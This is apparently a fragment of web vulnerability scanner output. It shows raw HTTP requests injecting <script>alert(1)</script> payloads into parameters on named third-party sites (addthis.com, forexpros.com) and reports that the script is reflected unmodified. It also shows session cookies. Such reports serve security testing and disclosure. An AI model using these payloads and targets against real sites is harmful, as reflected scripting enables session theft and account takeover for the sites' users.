GET /red/psi/sites/www.klivio.com/p.json?callback=_ate.ad.hpr7a43e<script>alert(1)</script>9a66bdcec19&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.klivio.com%2F%3F34aa6%2522%253E%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Eceac919ade3%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F69&fb5wa3 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 16:16:53 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 16:16:53 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 06 Feb 2011 16:16:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 16:16:53 GMT Connection: close
The value of the bg1 request parameter is copied into the HTML document as plain text between tags. The payload 6b18f<script>alert(1)</script>3e30c6ee661 was submitted in the bg1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF6b18f<script>alert(1)</script>3e30c6ee661&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3